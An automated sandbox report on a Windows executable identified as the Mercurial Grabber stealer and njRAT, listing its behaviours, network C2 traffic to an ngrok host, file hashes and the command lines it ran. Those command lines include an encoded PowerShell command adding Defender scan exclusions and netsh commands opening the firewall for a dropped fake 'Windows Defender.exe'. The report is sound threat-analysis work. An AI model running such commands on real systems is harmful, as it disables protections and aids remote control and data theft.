Analysis Overview
SHA256
8d38d3866a011792617c9784fc9dc556f0c8c6aeeeb96aef679aea6ff6831028
Threat Level: Known bad
The file 4e6984054c17293752f8d11ccac45e70.exe was found to be: Known bad.
Malicious Activity Summary
Mercurial Grabber Stealer
njRAT/Bladabindi
Looks for VirtualBox Guest Additions in registry
Modifies Windows Firewall
Looks for VMWare Tools registry key
Executes dropped EXE
Drops startup file
Checks BIOS information in registry
Checks computer location settings
Reads user/profile data of web browsers
Loads dropped DLL
Maps connected drives based on registry
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
Program crash
Suspicious use of AdjustPrivilegeToken
Delays execution with timeout.exe
Checks SCSI registry key(s)
Modifies system certificate store
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-10-03 23:20
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-10-03 23:20
Reported
2022-10-03 23:23
Platform
win7-20220812-en
Max time kernel
150s
Max time network
182s
Command Line
Signatures
Mercurial Grabber Stealer
njRAT/Bladabindi
Looks for VirtualBox Guest Additions in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe | N/A |
Looks for VMWare Tools registry key
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe | C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4e6984054c17293752f8d11ccac45e70.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4e6984054c17293752f8d11ccac45e70.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4e6984054c17293752f8d11ccac45e70.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip4.seeip.org | N/A | N/A |
| N/A | ip4.seeip.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip4.seeip.org | N/A | N/A |
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\output.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0 | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\AppData\Local\Temp\output.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\4e6984054c17293752f8d11ccac45e70.exe
"C:\Users\Admin\AppData\Local\Temp\4e6984054c17293752f8d11ccac45e70.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAbAB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAdQBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAaQB6ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAbABjACMAPgA="
C:\Users\Admin\AppData\Local\Temp\output.exe
"C:\Users\Admin\AppData\Local\Temp\output.exe"
C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
"C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\scam_woofer.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\mode.com
mode 80,15
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe" "Windows Defender.exe" ENABLE
C:\Windows\SysWOW64\netsh.exe
netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe" "Windows Defender.exe" ENABLE
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\mode.com
mode 130,30
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1568 -s 1856
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 6.tcp.eu.ngrok.io | udp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | ip4.seeip.org | udp |
| US | 23.128.64.141:443 | ip4.seeip.org | tcp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 96.16.53.134:80 | apps.identrust.com | tcp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| US | 23.128.64.141:443 | ip4.seeip.org | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.69.157.220:13992 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 6.tcp.eu.ngrok.io | udp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 3.66.38.117:13992 | 6.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 6.tcp.eu.ngrok.io | udp |
| DE | 18.197.239.109:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 18.197.239.109:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 18.197.239.109:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 18.197.239.109:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 18.197.239.109:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 18.197.239.109:13992 | 6.tcp.eu.ngrok.io | tcp |
| DE | 18.197.239.109:13992 | 6.tcp.eu.ngrok.io | tcp |
Files
memory/1004-54-0x0000000075211000-0x0000000075213000-memory.dmp
memory/1632-55-0x0000000000000000-mapping.dmp
memory/1568-58-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\output.exe
| MD5 | 5f34fc15a6555433e91d8dc0564d2092 |
| SHA1 | dc786e4ddf9af8de8909da2489d2848dd39f762a |
| SHA256 | c35218e577fe12ad1aa6835840f5b762893aeaa7759ea39aef6ef6b15a954e8c |
| SHA512 | fb90d8cfddd514cfc196149169c64578c11433ad27d0a0efc7394eae6b7a2f458d9184b84eec730e1a1ae1c5248a6749e6f21cdad42e1387e33ba1a23766b238 |
C:\Users\Admin\AppData\Local\Temp\output.exe
| MD5 | 5f34fc15a6555433e91d8dc0564d2092 |
| SHA1 | dc786e4ddf9af8de8909da2489d2848dd39f762a |
| SHA256 | c35218e577fe12ad1aa6835840f5b762893aeaa7759ea39aef6ef6b15a954e8c |
| SHA512 | fb90d8cfddd514cfc196149169c64578c11433ad27d0a0efc7394eae6b7a2f458d9184b84eec730e1a1ae1c5248a6749e6f21cdad42e1387e33ba1a23766b238 |
C:\Users\Admin\AppData\Local\Temp\output.exe
| MD5 | 5f34fc15a6555433e91d8dc0564d2092 |
| SHA1 | dc786e4ddf9af8de8909da2489d2848dd39f762a |
| SHA256 | c35218e577fe12ad1aa6835840f5b762893aeaa7759ea39aef6ef6b15a954e8c |
| SHA512 | fb90d8cfddd514cfc196149169c64578c11433ad27d0a0efc7394eae6b7a2f458d9184b84eec730e1a1ae1c5248a6749e6f21cdad42e1387e33ba1a23766b238 |
memory/884-63-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\Windows Defender.exe
| MD5 | 0c6c4a3d96c78a24d6568b83e141896e |
| SHA1 | f5fb76840cb984722f61b370fb6641fa4ad9ac7e |
| SHA256 | 73870820b2784abba4cc69c26a57743e5a4e306727c7dc2d28e5753fa5fed2d7 |
| SHA512 | 1700a41014d50b79dd896fee0a705c700f3c534860b0ceefebc6413941520aedad7aa85f1f4c11d84c362b46de15e5ca7d9fa4a108fbaa9ca895107dee1d68be |
C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
| MD5 | 0c6c4a3d96c78a24d6568b83e141896e |
| SHA1 | f5fb76840cb984722f61b370fb6641fa4ad9ac7e |
| SHA256 | 73870820b2784abba4cc69c26a57743e5a4e306727c7dc2d28e5753fa5fed2d7 |
| SHA512 | 1700a41014d50b79dd896fee0a705c700f3c534860b0ceefebc6413941520aedad7aa85f1f4c11d84c362b46de15e5ca7d9fa4a108fbaa9ca895107dee1d68be |
\Users\Admin\AppData\Local\Temp\Windows Defender.exe
| MD5 | 0c6c4a3d96c78a24d6568b83e141896e |
| SHA1 | f5fb76840cb984722f61b370fb6641fa4ad9ac7e |
| SHA256 | 73870820b2784abba4cc69c26a57743e5a4e306727c7dc2d28e5753fa5fed2d7 |
| SHA512 | 1700a41014d50b79dd896fee0a705c700f3c534860b0ceefebc6413941520aedad7aa85f1f4c11d84c362b46de15e5ca7d9fa4a108fbaa9ca895107dee1d68be |
memory/920-65-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
| MD5 | 0c6c4a3d96c78a24d6568b83e141896e |
| SHA1 | f5fb76840cb984722f61b370fb6641fa4ad9ac7e |
| SHA256 | 73870820b2784abba4cc69c26a57743e5a4e306727c7dc2d28e5753fa5fed2d7 |
| SHA512 | 1700a41014d50b79dd896fee0a705c700f3c534860b0ceefebc6413941520aedad7aa85f1f4c11d84c362b46de15e5ca7d9fa4a108fbaa9ca895107dee1d68be |
C:\Users\Admin\AppData\Local\Temp\scam_woofer.bat
| MD5 | 4b4e566a986fe97ba2d89f9c64a24c64 |
| SHA1 | 18bba3d5058b4b53fc99f9fba94110f4e8f8c2ea |
| SHA256 | 2950d0e125c3d1d11be27388ca83ef5d3fbcd71e49c0ed4eb0e0373340707a97 |
| SHA512 | 32e39cbd0ba54cd1bcf25158774a44060d65bdeef9de0986be5267c3da229d8e743afaa67b98492172b7b59cd3fb0cf9e0c5dc149651a3518479ac8af677cee8 |
memory/684-68-0x0000000000000000-mapping.dmp
memory/1568-69-0x00000000001C0000-0x00000000001D0000-memory.dmp
memory/1540-71-0x0000000000000000-mapping.dmp
memory/884-73-0x0000000073E10000-0x00000000743BB000-memory.dmp
memory/432-72-0x0000000000000000-mapping.dmp
memory/1632-74-0x0000000073E10000-0x00000000743BB000-memory.dmp
memory/336-75-0x0000000000000000-mapping.dmp
memory/1632-76-0x0000000073E10000-0x00000000743BB000-memory.dmp
memory/824-77-0x0000000000000000-mapping.dmp
memory/1752-79-0x0000000000000000-mapping.dmp
memory/1464-80-0x0000000000000000-mapping.dmp
memory/1076-83-0x0000000000000000-mapping.dmp
memory/1668-84-0x0000000000000000-mapping.dmp
memory/1820-85-0x0000000000000000-mapping.dmp
memory/1748-86-0x0000000000000000-mapping.dmp
memory/884-87-0x0000000073E10000-0x00000000743BB000-memory.dmp
memory/1516-88-0x0000000000000000-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-10-03 23:20
Reported
2022-10-03 23:24
Platform
win10v2004-20220812-en
Max time kernel
160s
Max time network
181s
Command Line
Signatures
